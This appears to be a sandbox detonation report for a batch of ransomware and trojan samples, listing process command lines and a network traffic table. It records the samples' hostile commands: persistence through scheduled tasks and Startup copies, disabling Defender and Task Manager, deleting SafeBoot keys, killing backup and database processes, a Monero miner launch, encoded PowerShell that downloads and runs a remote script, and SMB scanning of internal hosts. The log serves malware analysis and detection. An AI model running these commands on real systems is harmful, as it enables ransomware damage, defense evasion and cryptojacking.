C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
C:\Users\Admin\Desktop\00467\HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
HEUR-Trojan.MSIL.Crypt.gen-deb8b966472fc6965603cf2f0b518bf46ae0b57a871afe96f4555541b42ea7d2.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection twitch.tv
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7860 -ip 7860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 456 -ip 456
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6916 -ip 6916
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 6840 -ip 6840
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6848 -ip 6848
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 6792 -ip 6792
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 7116 -ip 7116
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 456 -s 268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 300
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /RU SYSTEM /RL HIGHEST /F
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
C:\Users\Admin\AppData\Local\Temp\system.exe
"C:\Users\Admin\AppData\Local\Temp\system.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\07baf339-4cae-4dfc-a0cc-c3016531c157" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c copy C:\ProgramData\harma.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
Trojan-Ransom.Win32.Agent.aumz-01fa1ed69196ed40a66dbf458eaa6bdf983263175101c505eae366b85727e26e.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN DHARMA /TR C:\ProgramData\harma.exe /F
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
Trojan-Ransom.Win32.Blocker.kpuo-cf1b437b549b1d33704ff504940c50e7943fe7eb70fb927a8b161ea383df5954.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
Trojan-Ransom.Win32.Cryptodef.adbh-14259c6645fadc816ba82c52c050f1b58b5507ba292985ee29931341700ac55c.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
Trojan-Ransom.Win32.Cryptodef.aoo-1dece757fb0cdc99d5caa035d41970e2a32ac4c0b03c94f3c029b2fd85d90b7f.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
Trojan-Ransom.Win32.Digitala.do-7424ec4f70d0c951ad4d4621926aa964fec54031f79aa2c83139dae17c2f3239.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
Trojan-Ransom.Win32.Encoder.nqo-ffa161868f119cba31247237ee41aaa1ae427837f73fc312214101f09fc3f9e3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
C:\Users\Admin\AppData\Local\Temp\wujek.exe
"C:\Users\Admin\AppData\Local\Temp\wujek.exe"
C:\831897~1.EXE
"C:\831897~1.EXE"
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
Trojan-Ransom.Win32.GandCrypt.jfg-c8c08da8d15d8d673674a59eeabd6b212647b57a846b72b6c76b321f34401f69.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 9396 -ip 9396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 9396 -s 392
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN hrm /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /RU SYSTEM /RL HIGHEST /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /SC ONLOGON /TN Harma /TR "HEUR-Trojan-Ransom.Win32.Generic-72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2.exe" /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s harma.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s harma.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\harma.exe
C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\harma.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Users\Admin\Desktop\00467\Trojan-Ransom.Win32.Foreign.oebz-db81030d7f1f10b1cb808b0a319ec1fafa06a97d54803c6cd61be56cad196994.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Users\Admin\AppData\Roaming\MAINPROC.exe
"C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPRIV C:\ProgramData\HRMPRIV
C:\Windows\SysWOW64\icacls.exe
icacls * /grant Everyone:(OI)(CI)F /T /C /Q
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im veeam*
C:\Windows\explorer.exe
C:\Windows\explorer.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45R4Kg7FJmq8ExsZZwNgca2YdATVRcza4bCwpzf9dGdabt5om6SYLuVfnwFRVyj8dx9paSBaN9PXkELkJQNs3WvGMZ9NqUs --pass=csgocheat --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=4 --unam-idle-cpu=100 --tls --unam-stealth
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
"C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /t /f /im sql*
C:\Windows\xk.exe
C:\Windows\xk.exe
C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe
"C:\Users\Admin\Desktop\00467\HEUR-Trojan-Ransom.Win32.Stop.gen-fb2c6fec5db844413c6c2f3b0cad79c75aadf31d18c82c7e40768a11788df362.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\IExplorer.exe
C:\Windows\system32\IExplorer.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy HRMPUB C:\ProgramData\HRMPUB
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
C:\Windows\SysWOW64\svchost.exe
"C:\Windows\syswow64\svchost.exe"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy id.harma C:\ProgramData\id.harma
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\HRMPRIV %userprofile%\Desktop\HRMPRIV
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\FILES ENCRYPTED.txt" "%userprofile%\Desktop\FILES ENCRYPTED.txt"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\SysWOW64\reg.exe
reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMQA5ADAAMgAxADcANgAxADkANQAxADgANgA3ADIAOAAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Roaming\msupdate\svhost.exe
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\system.exe" "system.exe" ENABLE
C:\Windows\SysWOW64\shell.exe
"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\Temp\SMSS.exe"
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\xk.exe
C:\Windows\xk.exe
C:\Windows\SysWOW64\IExplorer.exe
C:\Windows\system32\IExplorer.exe
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE
"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | iridium.services | udp |
| US | 99.83.138.213:443 | iridium.services | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 216.58.204.68:443 | www.google.com | tcp |
| GB | 92.123.128.167:443 | www.bing.com | tcp |
| GB | 92.123.128.167:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 68.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | poshmarktools.com | udp |
| US | 172.67.187.66:80 | poshmarktools.com | tcp |
| US | 172.67.187.66:443 | poshmarktools.com | tcp |
| US | 8.8.8.8:53 | 66.187.67.172.in-addr.arpa | udp |
| US | 172.67.187.66:80 | poshmarktools.com | tcp |
| US | 172.67.187.66:443 | poshmarktools.com | tcp |
| US | 8.8.8.8:53 | outlook.com | udp |
| AT | 86.59.21.38:80 | tcp | |
| US | 8.8.8.8:53 | bing.com | udp |
| US | 8.8.8.8:53 | theonlinesportsgroup.net | udp |
| US | 8.8.8.8:53 | remotenetwork.xyz | udp |
| US | 8.8.8.8:53 | gavenetwork.bar | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 172.67.169.89:443 | yip.su | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.169.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 172.217.169.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 67.169.217.172.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.56:445 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.52:445 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.48:445 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.0.51:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.0.50:445 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.60:445 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.65:445 | tcp | |
| N/A | 10.127.0.58:445 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.55:445 | tcp | |
| N/A | 10.127.0.49:445 | tcp | |
| N/A | 10.127.0.57:445 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.54:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.67:445 | tcp | |
| N/A | 10.127.0.46:445 | tcp | |
| N/A | 10.127.0.64:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.63:445 | tcp | |
| N/A | 10.127.0.59:445 | tcp | |
| N/A | 10.127.0.93:445 | tcp | |
| N/A | 10.127.0.53:445 | tcp | |
| N/A | 10.127.0.74:445 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.61:445 | tcp | |
| N/A | 10.127.0.72:445 | tcp | |
| N/A | 10.127.0.62:445 | tcp | |
| N/A | 10.127.0.88:445 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.0.99:445 | tcp | |
| N/A | 10.127.0.76:445 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.73:445 | tcp | |
| N/A | 10.127.0.47:445 | tcp | |
| N/A | 10.127.0.100:445 | tcp | |
| N/A | 10.127.0.79:445 | tcp | |
| N/A | 10.127.0.81:445 | tcp | |
| N/A | 10.127.0.83:445 | tcp | |
| N/A | 10.127.0.98:445 | tcp | |
| N/A | 10.127.0.68:445 | tcp | |
| N/A | 10.127.0.71:445 | tcp | |
| N/A | 10.127.0.96:445 | tcp | |
| N/A | 10.127.0.66:445 | tcp | |
| N/A | 10.127.0.91:445 | tcp | |
| N/A | 10.127.0.70:445 | tcp | |
| N/A | 10.127.0.85:445 | tcp | |
| N/A | 10.127.0.102:445 | tcp | |
| N/A | 10.127.0.92:445 | tcp | |
| N/A | 10.127.0.94:445 | tcp | |
| N/A | 10.127.0.97:445 | tcp | |
| N/A | 10.127.0.82:445 | tcp | |
| N/A | 10.127.0.69:445 | tcp | |
| N/A | 10.127.0.75:445 | tcp | |
| N/A | 10.127.0.77:445 | tcp | |
| N/A | 10.127.0.80:445 | tcp | |
| N/A | 10.127.0.95:445 | tcp | |
| N/A | 10.127.0.87:445 | tcp | |
| N/A | 10.127.0.90:445 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| N/A | 10.127.0.84:445 | tcp | |
| N/A | 10.127.0.101:445 | tcp | |
| N/A | 10.127.0.89:445 | tcp | |
| N/A | 10.127.0.86:445 | tcp | |
| N/A | 10.127.0.78:445 | tcp | |
| N/A | 10.127.0.124:445 | tcp | |
| N/A | 10.127.0.136:445 | tcp | |
| N/A | 10.127.0.148:445 | tcp | |
| N/A | 10.127.0.140:445 | tcp | |
| N/A | 10.127.0.105:445 | tcp | |
| N/A | 10.127.0.131:445 | tcp | |
| N/A | 10.127.0.141:445 | tcp | |
| N/A | 10.127.0.152:445 | tcp | |
| N/A | 10.127.0.154:445 | tcp | |
| N/A | 10.127.0.144:445 | tcp | |
| N/A | 10.127.0.127:445 | tcp | |
| N/A | 10.127.0.158:445 | tcp | |
| N/A | 10.127.0.116:445 | tcp | |
| N/A | 10.127.0.118:445 | tcp | |
| N/A | 10.127.0.157:445 | tcp | |
| N/A | 10.127.0.125:445 | tcp | |
| N/A | 10.127.0.162:445 | tcp | |
| N/A | 10.127.0.115:445 | tcp | |
| N/A | 10.127.0.111:445 | tcp | |
| N/A | 10.127.0.133:445 | tcp | |
| N/A | 10.127.0.150:445 | tcp | |
| N/A | 10.127.0.155:445 | tcp | |
| N/A | 10.127.0.161:445 | tcp | |
| N/A | 10.127.0.128:445 | tcp | |
| N/A | 10.127.0.139:445 | tcp | |
| N/A | 10.127.0.120:445 | tcp | |
| N/A | 10.127.0.143:445 | tcp | |
| N/A | 10.127.0.167:445 | tcp | |
| N/A | 10.127.0.138:445 | tcp | |
| N/A | 10.127.0.117:445 | tcp | |
| N/A | 10.127.0.147:445 | tcp | |
| N/A | 10.127.0.129:445 | tcp | |
| N/A | 10.127.0.108:445 | tcp | |
| N/A | 10.127.0.145:445 | tcp | |
| N/A | 10.127.0.119:445 | tcp | |
| N/A | 10.127.0.153:445 | tcp | |
| N/A | 10.127.0.137:445 | tcp | |
| N/A | 10.127.0.121:445 | tcp | |
| N/A | 10.127.0.107:445 | tcp | |
| N/A | 10.127.0.110:445 | tcp | |
| N/A | 10.127.0.126:445 | tcp | |
| N/A | 10.127.0.103:445 | tcp | |
| N/A | 10.127.0.135:445 | tcp | |
| N/A | 10.127.0.159:445 | tcp | |
| US | 8.8.8.8:53 | twitch.tv | udp |
| N/A | 10.127.0.142:445 | tcp | |
| N/A | 10.127.0.134:445 | tcp | |
| N/A | 10.127.0.109:445 | tcp | |
| N/A | 10.127.0.122:445 | tcp | |
| N/A | 10.127.0.112:445 | tcp | |
| N/A | 10.127.0.104:445 | tcp | |
| N/A | 10.127.0.132:445 | tcp | |
| N/A | 10.127.0.114:445 | tcp | |
| N/A | 10.127.0.130:445 | tcp | |
| N/A | 10.127.0.156:445 | tcp | |
| N/A | 10.127.0.146:445 | tcp | |
| N/A | 10.127.0.166:445 | tcp | |
| N/A | 10.127.0.113:445 | tcp | |
| N/A | 10.127.0.165:445 | tcp | |
| N/A | 10.127.0.160:445 | tcp | |
| N/A | 10.127.0.106:445 | tcp | |
| US | 13.248.252.114:443 | iridium.services | tcp |
| N/A | 10.127.0.151:445 | tcp | |
| N/A | 10.127.0.163:445 | tcp | |
| N/A | 10.127.0.149:445 | tcp | |
| N/A | 10.127.0.123:445 | tcp | |
| N/A | 10.127.0.164:445 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.174:445 | tcp | |
| N/A | 10.127.0.185:445 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
